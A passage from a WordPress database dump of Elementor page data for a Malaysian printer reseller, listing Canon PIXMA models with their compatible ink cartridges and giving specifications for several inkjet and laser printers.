(Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6988,3311,'_elementor_version','2.5.14'),(7017,3316,'_wp_page_template','template-fullwidth.php'),(7018,3316,'_elementor_edit_mode','builder'),(7019,3316,'_elementor_template_type','post'),(7020,3316,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" 